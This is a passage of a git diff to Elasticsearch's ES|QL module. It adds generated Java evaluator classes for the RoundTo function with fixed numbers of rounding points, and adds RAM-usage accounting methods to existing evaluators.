p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendDouble(RoundToDouble.process(fieldBlock.getDouble(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7)); + } + return result.build(); + } + } + + public DoubleVector eval(int positionCount, DoubleVector fieldVector) { + try(DoubleVector.FixedBuilder result = driverContext.blockFactory().newDoubleVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendDouble(p, RoundToDouble.process(fieldVector.getDouble(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToDouble8Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final double p0; + + private final double p1; + + 
private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final double p7; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, double p7) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + } + + @Override + public RoundToDouble8Evaluator get(DriverContext context) { + return new RoundToDouble8Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, context); + } + + @Override + public String toString() { + return "RoundToDouble8Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble9Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble9Evaluator.java new file mode 100644 index 0000000000000..85722c64bd186 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble9Evaluator.java @@ -0,0 +1,188 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DoubleBlock; +import org.elasticsearch.compute.data.DoubleVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToDouble}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. 
+ */ +public final class RoundToDouble9Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble9Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final double p7; + + private final double p8; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToDouble9Evaluator(Source source, EvalOperator.ExpressionEvaluator field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, double p7, double p8, + DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (DoubleBlock fieldBlock = (DoubleBlock) field.eval(page)) { + DoubleVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { + try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendDouble(RoundToDouble.process(fieldBlock.getDouble(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8)); + } + return result.build(); + } + } + + public DoubleVector eval(int positionCount, DoubleVector fieldVector) { + try(DoubleVector.FixedBuilder result = driverContext.blockFactory().newDoubleVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendDouble(p, RoundToDouble.process(fieldVector.getDouble(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToDouble9Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final 
EvalOperator.ExpressionEvaluator.Factory field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final double p7; + + private final double p8; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, double p7, double p8) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + } + + @Override + public RoundToDouble9Evaluator get(DriverContext context) { + return new RoundToDouble9Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, p8, context); + } + + @Override + public String toString() { + return "RoundToDouble9Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleBinarySearchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleBinarySearchEvaluator.java index da49b9c9a0990..7b44e045385cf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleBinarySearchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleBinarySearchEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
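For point counts with no unrolled class, the diff also updates the array-backed fallbacks, RoundToDoubleLinearSearchEvaluator and RoundToDoubleBinarySearchEvaluator (next). A sketch of what a binary-search fallback plausibly computes, under the same assumed round-down semantics; this is an illustration, not the generated implementation:

import java.util.Arrays;

final class RoundToBinarySearchSketch {
    // points must be sorted ascending.
    static double process(double v, double[] points) {
        int i = Arrays.binarySearch(points, v);
        if (i >= 0) {
            return points[i]; // exact hit
        }
        int insertion = -i - 1; // index of the first point greater than v
        return insertion == 0 ? points[0] : points[insertion - 1];
    }
}

Keeping both variants suggests linear search wins on small arrays while binary search wins on large ones, with the unrolled classes covering the smallest counts of all.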
*/ public final class RoundToDoubleBinarySearchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDoubleBinarySearchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleLinearSearchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleLinearSearchEvaluator.java index 8485e6576f82c..8d25ec29306d3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleLinearSearchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleLinearSearchEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToDoubleLinearSearchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDoubleLinearSearchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt10Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt10Evaluator.java new file mode 100644 index 0000000000000..66b3fc6ba0a85 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt10Evaluator.java @@ -0,0 +1,194 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. 
+package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.IntBlock; +import org.elasticsearch.compute.data.IntVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToInt}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToInt10Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt10Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final int p7; + + private final int p8; + + private final int p9; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToInt10Evaluator(Source source, EvalOperator.ExpressionEvaluator field, int p0, + int p1, int p2, int p3, int p4, int p5, int p6, int p7, int p8, int p9, + DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.p9 = p9; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (IntBlock fieldBlock = (IntBlock) field.eval(page)) { + IntVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public IntBlock eval(int positionCount, IntBlock fieldBlock) { + try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendInt(RoundToInt.process(fieldBlock.getInt(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8, this.p9)); + } + return result.build(); + } + } + + public IntVector eval(int positionCount, IntVector fieldVector) { + try(IntVector.FixedBuilder result = driverContext.blockFactory().newIntVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendInt(p, RoundToInt.process(fieldVector.getInt(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, 
this.p8, this.p9)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToInt10Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + ", p9=" + p9 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final int p7; + + private final int p8; + + private final int p9; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6, int p7, int p8, int p9) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.p9 = p9; + } + + @Override + public RoundToInt10Evaluator get(DriverContext context) { + return new RoundToInt10Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, p8, p9, context); + } + + @Override + public String toString() { + return "RoundToInt10Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + ", p9=" + p9 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt1Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt1Evaluator.java index 37d2ecc276d06..73d42e28e21e3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt1Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt1Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class RoundToInt1Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt1Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt2Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt2Evaluator.java index e0fc9bd130fed..e26ce881aae3b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt2Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt2Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToInt2Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt2Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt3Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt3Evaluator.java index d426c15c38eee..593aadf9f9a65 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt3Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt3Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class RoundToInt3Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt3Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -57,6 +60,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt4Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt4Evaluator.java index 8f47de82b63ae..9fc79057093fa 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt4Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt4Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToInt4Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt4Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -60,6 +63,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt6Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt6Evaluator.java new file mode 100644 index 0000000000000..ef78ae14a76fb --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt6Evaluator.java @@ -0,0 +1,169 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. 
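+// A minimal usage sketch (names and values hypothetical, not part of the
+// generated file): evaluators in this family are built through their nested
+// Factory and then driven page by page, e.g.
+//
+//   EvalOperator.ExpressionEvaluator.Factory factory =
+//       new RoundToInt6Evaluator.Factory(source, fieldFactory, 0, 10, 20, 30, 40, 50);
+//   try (EvalOperator.ExpressionEvaluator evaluator = factory.get(driverContext);
+//        Block result = evaluator.eval(page)) {
+//     // each position now holds its input snapped to one of the six points
+//   }
+//
+// Unrolling the rounding points into the fields p0..p5 keeps the per-row call
+// RoundToInt.process(value, p0, ..., p5) free of array indirection.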
+package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.IntBlock; +import org.elasticsearch.compute.data.IntVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToInt}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToInt6Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt6Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToInt6Evaluator(Source source, EvalOperator.ExpressionEvaluator field, int p0, int p1, + int p2, int p3, int p4, int p5, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (IntBlock fieldBlock = (IntBlock) field.eval(page)) { + IntVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public IntBlock eval(int positionCount, IntBlock fieldBlock) { + try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendInt(RoundToInt.process(fieldBlock.getInt(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5)); + } + return result.build(); + } + } + + public IntVector eval(int positionCount, IntVector fieldVector) { + try(IntVector.FixedBuilder result = driverContext.blockFactory().newIntVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendInt(p, RoundToInt.process(fieldVector.getInt(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToInt6Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + "]"; + } + + @Override + public 
void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, int p0, int p1, + int p2, int p3, int p4, int p5) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + } + + @Override + public RoundToInt6Evaluator get(DriverContext context) { + return new RoundToInt6Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, context); + } + + @Override + public String toString() { + return "RoundToInt6Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt7Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt7Evaluator.java new file mode 100644 index 0000000000000..5d4f5a39158d1 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt7Evaluator.java @@ -0,0 +1,175 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import 